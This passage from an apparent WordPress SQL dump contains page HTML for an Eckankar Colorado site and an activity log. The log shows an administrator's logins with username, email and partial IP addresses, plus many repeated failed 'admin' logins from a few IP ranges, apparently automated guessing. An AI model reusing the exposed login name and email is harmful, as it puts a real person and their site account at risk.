line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; line-height: 22px; margin-top: 16px; color: #2c2a2a;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; line-height: 23px; color: #2c2a2a;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img bg-img-rounded-bottom-left bg-img-rounded-top-right\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img wp-image-268201 size-full aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 15px; color: #333333;\">(Member Newsletter Subscriptions<br>\r\nAre Available In The <a href=\"https://eckankar-colorado.org/members-page/\">Members Area</a>)</p>\r\n<p style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(227344,38205,'_message_key','post_updated'),(227345,38205,'_user_id','2'),(227346,38205,'_user_login','S8zhaBda'),(227347,38205,'_user_email','nada@zipnadanot.org'),(227348,38205,'_server_remote_addr','76.130.120.x'),(227349,38205,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(227350,38206,'_user_id','2'),(227351,38206,'_user_login','S8zhaBda'),(227352,38206,'_user_email','nada@zipnadanot.org'),(227353,38206,'_message_key','user_logged_out'),(227354,38206,'_server_remote_addr','76.130.120.x'),(227355,38206,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=page'),(227356,38207,'user_id','2'),(227357,38207,'user_email','nada@zipnadanot.org'),(227358,38207,'user_login','S8zhaBda'),(227359,38207,'_user_id','2'),(227360,38207,'_user_login','S8zhaBda'),(227361,38207,'_user_email','nada@zipnadanot.org'),(227362,38207,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(227363,38207,'_message_key','user_logged_in'),(227364,38207,'_server_remote_addr','76.130.120.x'),(227365,38207,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?loggedout=true&wp_lang=en_US'),(227366,38208,'failed_username','admin'),(227367,38208,'server_http_user_agent','Mozilla/5.0'),(227368,38208,'_message_key','user_unknown_login_failed'),(227369,38208,'_server_remote_addr','20.169.51.x'),(227370,38209,'_user_id','2'),(227371,38209,'_user_login','S8zhaBda'),(227372,38209,'_user_email','nada@zipnadanot.org'),(227373,38209,'_message_key','user_logged_out'),(227374,38209,'_server_remote_addr','76.130.120.x'),(227375,38209,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(227376,38210,'failed_username','admin'),(227377,38210,'server_http_user_agent','Mozilla/5.0'),(227378,38210,'_message_key','user_unknown_login_failed'),(227379,38210,'_server_remote_addr','20.169.51.x'),(227380,38211,'failed_username','admin'),(227381,38211,'server_http_user_agent','Mozilla/5.0'),(227382,38211,'_message_key','user_unknown_login_failed'),(227383,38211,'_server_remote_addr','45.136.118.x'),(227384,38212,'failed_username','admin'),(227385,38212,'server_http_user_agent','Mozilla/5.0'),(227386,38212,'_message_key','user_unknown_login_failed'),(227387,38212,'_server_remote_addr','20.169.51.x'),(227388,38213,'failed_username','admin'),(227389,38213,'server_http_user_agent','Mozilla/5.0'),(227390,38213,'_message_key','user_unknown_login_failed'),(227391,38213,'_server_remote_addr','45.136.118.x'),(227392,38214,'failed_username','admin'),(227393,38214,'server_http_user_agent','Mozilla/5.0'),(227394,38214,'_message_key','user_unknown_login_failed'),(227395,38214,'_server_remote_addr','20.169.51.x'),(227396,38215,'failed_username','admin'),(227397,38215,'server_http_user_agent','Mozilla/5.0'),(227398,38215,'_message_key','user_unknown_login_failed'),(227399,38215,'_server_remote_addr','45.136.118.x'),(227400,38216,'failed_username','admin'),(227401,38216,'server_http_user_agent','Mozilla/5.0'),(227402,38216,'_message_key','user_unknown_login_failed'),(227403,38216,'_server_remote_addr','20.169.51.x'),(227404,38217,'failed_username','admin'),(227405,38217,'server_http_user_agent','Mozilla/5.0'),(227406,38217,'_message_key','user_unknown_login_failed'),(227407,38217,'_server_remote_addr','45.136.118.x'),(227408,38218,'failed_username','admin'),(227409,38218,'server_http_user_agent','Mozilla/5.0'),(227410,38218,'_message_key','user_unknown_login_failed'),(227411,38218,'_server_remote_addr','13.51.201.x'),(227412,38219,'failed_username','admin'),(227413,38219,'server_http_user_agent','Mozilla/5.0'),(227414,38219,'_message_key','user_unknown_login_failed'),(227415,38219,'_server_remote_addr','20.169.51.x'),(227416,38220,'failed_username','admin'),(227417,38220,'server_http_user_agent','Mozilla/5.0'),(227418,38220,'_message_key','user_unknown_login_failed'),(227419,38220,'_server_remote_addr','45.136.118.x'),(227420,38221,'failed_username','admin'),(227421,38221,'server_http_user_agent','Mozilla/5.0'),(227422,38221,'_message_key','user_unknown_login_failed'),(227423,38221,'_server_remote_addr','20.169.51.x'),(227424,38222,'failed_username','admin'),(227425,38222,'server_http_user_agent','Mozilla/5.0'),(227426,38222,'_message_key','user_unknown_login_failed'),(227427,38222,'_server_remote_addr','45.136.118.x'),(227428,38223,'post_id','269211'),(227429,38223,'post_type','nf_sub'),(227430,38223,'post_title',''),(227431,38223,'_message_key','post_updated'),(227432,38223,'_server_remote_addr','98.38.198.x'),(227433,38223,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=Oct_2023_Chela_Newsletter&utm_medium=email'),(227434,38224,'failed_username','admin'),(227435,38224,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(227436,38224,'_message_key','user_unknown_login_failed'),(227437,38224,'_xmlrpc_request','true'),(227438,38224,'_server_remote_addr','20.168.14.x'),(227439,38225,'failed_username','admin'),(227440,38225,'server_http_user_agent','Mozilla/5.0'),(227441,38225,'_message_key','user_unknown_login_failed'),(227442,38225,'_server_remote_addr','20.169.51.x'),(227443,38226,'failed_username','admin'),(227444,38226,'server_http_user_agent','Mozilla/5.0'),(227445,38226,'_message_key','user_unknown_login_failed'),(227446,38226,'_server_remote_addr','45.136.118.x'),(227447,38227,'failed_username','admin'),(227448,38227,'server_http_user_agent','Mozilla/5.0'),(227449,38227,'_message_key','user_unknown_login_failed'),(227450,38227,'_server_remote_addr','45.136.118.x'),(227451,38228,'failed_username','admin'),(227452,38228,'server_http_user_agent','Mozilla/5.0'),(227453,38228,'_message_key','user_unknown_login_failed'),(227454,38228,'_server_remote_addr','20.169.51.x'),(227455,38229,'failed_username','admin'),(227456,38229,'server_http_user_agent','Mozilla/5.0'),(227457,38229,'_message_key','user_unknown_login_failed'),(227458,38229,'_server_remote_addr','45.136.118.x'),(227459,38230,'failed_username','admin'),(227460,38230,'server_http_user_agent','Mozilla/5.0'),(227461,38230,'_message_key','user_unknown_login_failed'),(227462,38230,'_server_remote_addr','20.169.51.x'),(227463,38231,'failed_username','admin'),(227464,38231,'server_http_user_agent','Mozilla/5.0'),(227465,38231,'_message_key','user_unknown_login_failed'),(227466,38231,'_server_remote_addr','45.136.118.x'),(227467,38232,'failed_username','admin'),(227468,38232,'server_http_user_agent','Mozilla/5.0'),(227469,38232,'_message_key','user_unknown_login_failed'),(227470,38232,'_server_remote_addr','20.169.51.x'),(227471,38233,'failed_username','admin'),(227472,38233,'server_http_user_agent','Mozilla/5.0'),(227473,38233,'_message_key','user_unknown_login_failed'),(227474,38233,'_server_remote_addr','45.136.118.x'),(227475,38234,'failed_username','admin'),(227476,38234,'server_http_user_agent','Mozilla/5.0'),(227477,38234,'_message_key','user_unknown_login_failed'),(227478,38234,'_server_remote_addr','20.169.51.x'),(227479,38235,'failed_username','admin'),(227480,38235,'server_http_user_agent','Mozilla/5.0'),(227481,38235,'_message_key','user_unknown_login_failed'),(227482,38235,'_server_remote_addr','13.51.201.x'),(227483,38236,'failed_username','admin'),(227484,38236,'server_http_user_agent','Mozilla/5.0'),(227485,38236,'_message_key','user_unknown_login_failed'),(227486,38236,'_server_remote_addr','45.136.118.x'),(227487,38237,'failed_username','admin'),(227488,38237,'server_http_user_agent','Mozilla/5.0'),(227489,38237,'_message_key','user_unknown_login_failed'),(227490,38237,'_server_remote_addr','20.169.51.x'),(227491,38238,'failed_username','admin'),(227492,38238,'server_http_user_agent','Mozilla/5.0'),(227493,38238,'_message_key','user_unknown_login_failed'),(227494,38238,'_server_remote_addr','45.136.118.x'),(227495,38239,'failed_username','admin'),(227496,38239,'server_http_user_agent','Mozilla/5.0'),(227497,38239,'_message_key','user_unknown_login_failed'),(227498,38239,'_server_remote_addr','20.169.51.x'),(227499,38240,'failed_username','admin'),(227500,38240,'server_http_user_agent','Mozilla/5.0'),(227501,38240,'_message_key','user_unknown_login_failed'),(227502,38240,'_server_remote_addr','45.136.118.x'),(227503,38241,'failed_username','admin'),(227504,38241,'server_http_user_agent','Mozilla/5.0'),(227505,38241,'_message_key','user_unknown_login_failed'),(227506,38241,'_server_remote_addr','20.169.51.x'),(227507,38242,'failed_username','admin'),(227508,38242,'server_http_user_agent','Mozilla/5.0'),(227509,38242,'_message_key','user_unknown_login_failed'),(227510,38242,'_server_remote_addr','45.136.118.x'),(227511,38243,'failed_username','admin'),(227512,38243,'server_http_user_agent','Mozilla/5.0'),(227513,38243,'_message_key','user_unknown_login_failed'),(227514,38243,'_server_remote_addr','20.169.51.x'),(227515,38244,'failed_username','admin'),(227516,38244,'server_http_user_agent','Mozilla/5.0'),(227517,38244,'_message_key','user_unknown_login_failed'),(227518,38244,'_server_remote_addr','45.136.118.x'),(227519,38245,'failed_username','admin'),(227520,38245,'server_http_user_agent','Mozilla/5.0'),(227521,38245,'_message_key','user_unknown_login_failed'),(227522,38245,'_server_remote_addr','20.169.51.x'),(227523,38246,'failed_username','admin'),(227524,38246,'server_http_user_agent','Mozilla/5.0'),(227525,38246,'_message_key','user_unknown_login_failed'),(227526,38246,'_server_remote_addr','45.136.118.x'),(227527,38247,'post_id','269212'),(227528,38247,'post_type','nf_sub'),(227529,38247,'post_title',''),(227530,38247,'_message_key','post_updated'),(227531,38247,'_server_remote_addr','209.131.238.x'),(227532,38247,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(227533,38248,'failed_username','admin'),(227534,38248,'server_http_user_agent','Mozilla/5.0'),(227535,38248,'_message_key','user_unknown_login_failed'),(227536,38248,'_server_remote_addr','20.169.51.x'),(227537,38249,'failed_username','admin'),(227538,38249,'server_http_user_agent','Mozilla/5.0'),(227539,38249,'_message_key','user_unknown_login_failed'),(227540,38249,'_server_remote_addr','45.136.118.x'),(227541,38250,'failed_username','admin'),(227542,38250,'server_http_user_agent','Mozilla/5.0'),(227543,38250,'_message_key','user_unknown_login_failed'),(227544,38250,'_server_remote_addr','13.51.201.x'),(227545,38251,'failed_username','admin'),(227546,38251,'server_http_user_agent','Mozilla/5.0'),(227547,38251,'_message_key','user_unknown_login_failed'),(227548,38251,'_server_remote_addr','20.169.51.x'),(227549,38252,'failed_username','admin'),(227550,38252,'server_http_user_agent','Mozilla/5.0'),(227551,38252,'_message_key','user_unknown_login_failed'),(227552,38252,'_server_remote_addr','45.136.118.x'),(227553,38253,'failed_username','admin'),(227554,38253,'server_http_user_agent','Mozilla/5.0'),(227555,38253,'_message_key','user_unknown_login_failed'),(227556,38253,'_server_remote_addr','20.168.9.x'),(227557,38254,'failed_username','admin'),(227558,38254,'server_http_user_agent','Mozilla/5.0'),(227559,38254,'_message_key','user_unknown_login_failed'),(227560,38254,'_server_remote_addr','20.169.51.x'),(227561,38255,'failed_username','admin'),(227562,38255,'server_http_user_agent','Mozilla/5.0'),(227563,38255,'_message_key','user_unknown_login_failed'),(227564,38255,'_server_remote_addr','45.136.118.x'),(227565,38256,'failed_username','admin'),(227566,38256,'server_http_user_agent','Mozilla/5.0'),(227567,38256,'_message_key','user_unknown_login_failed'),(227568,38256,'_server_remote_addr','20.168.9.x'),(227569,38257,'failed_username','admin'),(227570,38257,'server_http_user_agent','Mozilla/5.0'),(227571,38257,'_message_key','user_unknown_login_failed'),(227572,38257,'_server_remote_addr','20.169.51.x'),(227573,38258,'failed_username','admin'),(227574,38258,'server_http_user_agent','Mozilla/5.0'),(227575,38258,'_message_key','user_unknown_login_failed'),(227576,38258,'_server_remote_addr','45.136.118.x'),(227577,38259,'failed_username','admin'),(227578,38259,'server_http_user_agent','Mozilla/5.0'),(227579,38259,'_message_key','user_unknown_login_failed'),(227580,38259,'_server_remote_addr','45.136.118.x'),(227581,38260,'failed_username','admin'),(227582,38260,'server_http_user_agent','Mozilla/5.0'),(227583,38260,'_message_key','user_unknown_login_failed'),(227584,38260,'_server_remote_addr','20.169.51.x'),(227585,38261,'failed_username','admin'),(227586,38261,'server_http_user_agent','Mozilla/5.0'),(227587,38261,'_message_key','user_unknown_login_failed'),(227588,38261,'_server_remote_addr','20.168.9.x'),(227589,38262,'failed_username','admin'),(227590,38262,'server_http_user_agent','Mozilla/5.0'),(227591,38262,'_message_key','user_unknown_login_failed'),(227592,38262,'_server_remote_addr','45.136.118.x'),(227593,38263,'failed_username','admin'),(227594,38263,'server_http_user_agent','Mozilla/5.0'),(227595,38263,'_message_key','user_unknown_login_failed'),(227596,38263,'_server_remote_addr','20.169.51.x'),(227597,38264,'post_id','269213'),(227598,38264,'post_type','nf_sub'),(227599,38264,'post_title',''),(227600,38264,'_message_key','post_updated'),(227601,38264,'_server_remote_addr','73.34.30.x'),(227602,38264,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(227603,38265,'failed_username','admin'),(227604,38265,'server_http_user_agent','Mozilla/5.0'),(227605,38265,'_message_key','user_unknown_login_failed'),(227606,38265,'_server_remote_addr','45.136.118.x'),(227607,38266,'failed_username','admin'),(227608,38266,'server_http_user_agent','Mozilla/5.0'),(227609,38266,'_message_key','user_unknown_login_failed'),(227610,38266,'_server_remote_addr','20.168.9.x'),(227611,38267,'failed_username','admin'),(227612,38267,'server_http_user_agent','Mozilla/5.0'),(227613,38267,'_message_key','user_unknown_login_failed'),(227614,38267,'_server_remote_addr','20.169.51.x'),(227615,38268,'failed_username','admin'),(227616,38268,'server_http_user_agent','Mozilla/5.0'),(227617,38268,'_message_key','user_unknown_login_failed'),(227618,38268,'_server_remote_addr','45.136.118.x'),(227619,38269,'user_id','2'),(227620,38269,'user_email','nada@zipnadanot.org'),(227621,38269,'user_login','S8zhaBda'),(227622,38269,'_user_id','2'),(227623,38269,'_user_login','S8zhaBda'),(227624,38269,'_user_email','nada@zipnadanot.org'),(227625,38269,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(227626,38269,'_message_key','user_logged_in'),(227627,38269,'_server_remote_addr','76.130.120.x'),(227628,38269,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(227629,38270,'failed_username','admin'),(227630,38270,'server_http_user_agent','Mozilla/5.0'),(227631,38270,'_message_key','user_unknown_login_failed'),(227632,38270,'_server_remote_addr','20.169.51.x'),(227633,38271,'failed_username','admin'),(227634,38271,'server_http_user_agent','Mozilla/5.0'),(227635,38271,'_message_key','user_unknown_login_failed'),(227636,38271,'_server_remote_addr','20.168.9.x'),(227637,38272,'_user_id','2'),(227638,38272,'_user_login','S8zhaBda'),(227639,38272,'_user_email','nada@zipnadanot.org'),(227640,38272,'_message_key','user_logged_out'),(227641,38272,'_server_remote_addr','76.130.120.x'),(227642,38272,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(227643,38273,'failed_username','admin'),(227644,38273,'server_http_user_agent','Mozilla/5.0'),(227645,38273,'_message_key','user_unknown_login_failed'),(227646,38273,'_server_remote_addr','13.51.201.x'),(227647,38274,'failed_username','admin'),(227648,38274,'server_http_user_agent','Mozilla/5.0'),(227649,38274,'_message_key','user_unknown_login_failed'),(227650,38274,'_server_remote_addr','45.136.118.x'),(227651,38275,'failed_username','admin'),(227652,38275,'server_http_user_agent','Mozilla/5.0'),(227653,38275,'_message_key','user_unknown_login_failed'),(227654,38275,'_server_remote_addr','20.169.51.x'),(227655,38276,'failed_username','admin'),(227656,38276,'server_http_user_agent','Mozilla/5.0'),(227657,38276,'_message_key','user_unknown_login_failed'),(227658,38276,'_server_remote_addr','45.136.118.x'),(227659,38277,'failed_username','admin'),(227660,38277,'server_http_user_agent','Mozilla/5.0'),(227661,38277,'_message_key','user_unknown_login_failed'),(227662,38277,'_server_remote_addr','20.168.9.x'),(227663,38278,'failed_username','admin'),(227664,38278,'server_http_user_agent','Mozilla/5.0'),(227665,38278,'_message_key','user_unknown_login_failed'),(227666,38278,'_server_remote_addr','20.169.51.x'),(227667,38279,'failed_username','admin'),(227668,38279,'server_http_user_agent','Mozilla/5.0'),(227669,38279,'_message_key','user_unknown_login_failed'),(227670,38279,'_server_remote_addr','45.136.118.x'),(227671,38280,'failed_username','admin'),(227672,38280,'server_http_user_agent','Mozilla/5.0'),(227673,38280,'_message_key','user_unknown_login_failed'),(227674,38280,'_server_remote_addr','20.169.51.x'),(227675,38281,'failed_username','admin'),(227676,38281,'server_http_user_agent','Mozilla/5.0'),(227677,38281,'_message_key','user_unknown_login_failed'),(227678,38281,'_server_remote_addr','45.136.118.x'),(227679,38282,'failed_username','admin'),(227680,38282,'server_http_user_agent','Mozilla/5.0'),(227681,38282,'_message_key','user_unknown_login_failed'),(227682,38282,'_server_remote_addr','20.168.9.x'),(227683,38283,'failed_username','admin'),(227684,38283,'server_http_user_agent','Mozilla/5.0'),(227685,38283,'_message_key','user_unknown_login_failed'),(227686,38283,'_server_remote_addr','20.169.51.x'),(227687,38284,'failed_username','admin'),(227688,38284,'server_http_user_agent','Mozilla/5.0'),(227689,38284,'_message_key','user_unknown_login_failed'),(227690,38284,'_server_remote_addr','45.136.118.x'),(227691,38285,'failed_username','admin'),(227692,38285,'server_http_user_agent','Mozilla/5.0'),(227693,38285,'_message_key','user_unknown_login_failed'),(227694,38285,'_server_remote_addr','20.169.51.x'),(227695,38286,'failed_username','admin'),(227696,38286,'server_http_user_agent','Mozilla/5.0'),(227697,38286,'_message_key','user_unknown_login_failed'),(227698,38286,'_server_remote_addr','20.168.9.x'),(227699,38287,'failed_username','admin'),(227700,38287,'server_http_user_agent','Mozilla/5.0'),(227701,38287,'_message_key','user_unknown_login_failed'),(227702,38287,'_server_remote_addr','45.136.118.x'),(227703,38288,'failed_username','admin'),(227704,38288,'server_http_user_agent','Mozilla/5.0'),(227705,38288,'_message_key','user_unknown_login_failed'),(227706,38288,'_server_remote_addr','20.169.51.x'),(227707,38289,'failed_username','admin'),(227708,38289,'server_http_user_agent','Mozilla/5.0'),(227709,38289,'_message_key','user_unknown_login_failed'),(227710,38289,'_server_remote_addr','45.136.118.x'),(227711,38290,'failed_username','admin'),(227712,38290,'server_http_user_agent','Mozilla/5.0'),(227713,38290,'_message_key','user_unknown_login_failed'),(227714,38290,'_server_remote_addr','20.168.9.x'),(227715,38291,'failed_username','admin'),(227716,38291,'server_http_user_agent','Mozilla/5.0'),(227717,38291,'_message_key','user_unknown_login_failed'),(227718,38291,'_server_remote_addr','20.169.51.x'),(227719,38292,'failed_username','admin'),(227720,38292,'server_http_user_agent','Mozilla/5.0'),(227721,38292,'_message_key','user_unknown_login_failed'),(227722,38292,'_server_remote_addr','45.136.118.x'),(227723,38293,'failed_username','admin'),(227724,38293,'server_http_user_agent','Mozilla/5.0'),(227725,38293,'_message_key','user_unknown_login_failed'),(227726,38293,'_server_remote_addr','13.51.201.x'),(227727,38294,'failed_username','admin'),(227728,38294,'server_http_user_agent','Mozilla/5.0'),(227729,38294,'_message_key','user_unknown_login_failed'),(227730,38294,'_server_remote_addr','45.136.118.x'),(227731,38295,'failed_username','admin'),(227732,38295,'server_http_user_agent','Mozilla/5.0'),(227733,38295,'_message_key','user_unknown_login_failed'),(227734,38295,'_server_remote_addr','20.169.51.x'),(227735,38296,'failed_username','admin'),(227736,38296,'server_http_user_agent','Mozilla/5.0'),(227737,38296,'_message_key','user_unknown_login_failed'),(227738,38296,'_server_remote_addr','20.168.9.x'),(227739,38297,'failed_username','admin'),(227740,38297,'server_http_user_agent','Mozilla/5.0'),(227741,38297,'_message_key','user_unknown_login_failed'),(227742,38297,'_server_remote_addr','45.136.118.x'),(227743,38298,'failed_username','admin'),(227744,38298,'server_http_user_agent','Mozilla/5.0'),(227745,38298,'_message_key','user_unknown_login_failed'),(227746,38298,'_server_remote_addr','20.169.51.x'),(227747,38299,'failed_username','admin'),(227748,38299,'server_http_user_agent','Mozilla/5.0'),(227749,38299,'_message_key','user_unknown_login_failed'),(227750,38299,'_server_remote_addr','45.136.118.x'),(227751,38300,'failed_username','admin'),(227752,38300,'server_http_user_agent','Mozilla/5.0'),(227753,38300,'_message_key','user_unknown_login_failed'),(227754,38300,'_server_remote_addr','20.168.9.x'),(227755,38301,'failed_username','admin'),(227756,38301,'server_http_user_agent','Mozilla/5.0'),(227757,38301,'_message_key','user_unknown_login_failed'),(227758,38301,'_server_remote_addr','20.169.51.x'),(227759,38302,'failed_username','admin'),(227760,38302,'server_http_user_agent','Mozilla/5.0'),(227761,38302,'_message_key','user_unknown_login_failed'),(227762,38302,'_server_remote_addr','45.136.118.x'),(227763,38303,'failed_username','admin'),(227764,38303,'server_http_user_agent','Mozilla/5.0'),(227765,38303,'_message_key','user_unknown_login_failed'),(227766,38303,'_server_remote_addr','20.169.51.x'),(227767,38304,'failed_username','admin'),(227768,38304,'server_http_user_agent','Mozilla/5.0'),(227769,38304,'_message_key','user_unknown_login_failed'),(227770,38304,'_server_remote_addr','20.168.9.x'),(227771,38305,'failed_username','admin'),(227772,38305,'server_http_user_agent','Mozilla/5.0'),(227773,38305,'_message_key','user_unknown_login_failed'),(227774,38305,'_server_remote_addr','45.136.118.x'),(227775,38306,'failed_username','admin'),(227776,38306,'server_http_user_agent','Mozilla/5.0'),(227777,38306,'_message_key','user_unknown_login_failed'),(227778,38306,'_server_remote_addr','20.169.51.x'),(227779,38307,'failed_username','admin'),(227780,38307,'server_http_user_agent','Mozilla/5.0'),(227781,38307,'_message_key','user_unknown_login_failed'),(227782,38307,'_server_remote_addr','45.136.118.x'),(227783,38308,'failed_username','admin'),(227784,38308,'server_http_user_agent','Mozilla/5.0'),(227785,38308,'_message_key','user_unknown_login_failed'),(227786,38308,'_server_remote_addr','20.169.51.x'),(227787,38309,'failed_username','admin'),(227788,38309,'server_http_user_agent','Mozilla/5.0'),(227789,38309,'_message_key','user_unknown_login_failed'),(227790,38309,'_server_remote_addr','20.168.9.x'),(227791,38310,'failed_username','admin'),(227792,38310,'server_http_user_agent','Mozilla/5.0'),(227793,38310,'_message_key','user_unknown_login_failed'),(227794,38310,'_server_remote_addr','45.136.118.x'),(227795,38311,'failed_username','admin'),(227796,38311,'server_http_user_agent','Mozilla/5.0'),(227797,38311,'_message_key','user_unknown_login_failed'),(227798,38311,'_server_remote_addr','13.51.201.x'),(227799,38312,'failed_username','admin'),(227800,38312,'server_http_user_agent','Mozilla/5.0'),(227801,38312,'_message_key','user_unknown_login_failed'),(227802,38312,'_server_remote_addr','20.169.51.x'),(227803,38313,'failed_username','admin'),(227804,38313,'server_http_user_agent','Mozilla/5.0'),(227805,38313,'_message_key','user_unknown_login_failed'),(227806,38313,'_server_remote_addr','45.136.118.x'),(227807,38314,'failed_username','admin'),(227808,38314,'server_http_user_agent','Mozilla/5.0'),(227809,38314,'_message_key','user_unknown_login_failed'),(227810,38314,'_server_remote_addr','20.168.9.x'),(227811,38315,'failed_username','admin'),(227812,38315,'server_http_user_agent','Mozilla/5.0'),(227813,38315,'_message_key','user_unknown_login_failed'),(227814,38315,'_server_remote_addr','20.169.51.x'),(227815,38316,'failed_username','admin'),(227816,38316,'server_http_user_agent','Mozilla/5.0'),(227817,38316,'_message_key','user_unknown_login_failed'),(227818,38316,'_server_remote_addr','45.136.118.x'),(227819,38317,'post_id','269214'),(227820,38317,'post_type','nf_sub'),(227821,38317,'post_title',''),(227822,38317,'_message_key','post_updated'),(227823,38317,'_server_remote_addr','104.28.130.x'),(227824,38317,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(227825,38318,'failed_username','admin'),(227826,38318,'server_http_user_agent','Mozilla/5.0'),(227827,38318,'_message_key','user_unknown_login_failed'),(227828,38318,'_server_remote_addr','20.169.51.x'),(227829,38319,'failed_username','admin'),(227830,38319,'server_http_user_agent','Mozilla/5.0'),(227831,38319,'_message_key','user_unknown_login_failed'),(227832,38319,'_server_remote_addr','45.136.118.x'),(227833,38320,'failed_username','admin'),(227834,38320,'server_http_user_agent','Mozilla/5.0'),(227835,38320,'_message_key','user_unknown_login_failed'),(227836,38320,'_server_remote_addr','20.168.9.x'),(227837,38321,'failed_username','admin'),(227838,38321,'server_http_user_agent','Mozilla/5.0'),(227839,38321,'_message_key','user_unknown_login_failed'),(227840,38321,'_server_remote_addr','20.169.51.x'),(227841,38322,'failed_username','admin'),(227842,38322,'server_http_user_agent','Mozilla/5.0'),(227843,38322,'_message_key','user_unknown_login_failed'),(227844,38322,'_server_remote_addr','45.136.118.x'),(227845,38323,'failed_username','admin'),(227846,38323,'server_http_user_agent','Mozilla/5.0'),(227847,38323,'_message_key','user_unknown_login_failed'),(227848,38323,'_server_remote_addr','20.169.51.x'),(227849,38324,'failed_username','admin'),(227850,38324,'server_http_user_agent','Mozilla/5.0'),(227851,38324,'_message_key','user_unknown_login_failed'),(227852,38324,'_server_remote_addr','45.136.118.x'),(227853,38325,'failed_username','admin'),(227854,38325,'server_http_user_agent','Mozilla/5.0'),(227855,38325,'_message_key','user_unknown_login_failed'),(227856,38325,'_server_remote_addr','20.168.9.x'),(227857,38326,'failed_username','admin'),(227858,38326,'server_http_user_agent','Mozilla/5.0'),(227859,38326,'_message_key','user_unknown_login_failed'),(227860,38326,'_server_remote_addr','20.169.51.x'),(227861,38327,'failed_username','admin'),(227862,38327,'server_http_user_agent','Mozilla/5.0'),(227863,38327,'_message_key','user_unknown_login_failed'),(227864,38327,'_server_remote_addr','45.136.118.x'),(227865,38328,'failed_username','admin'),(227866,3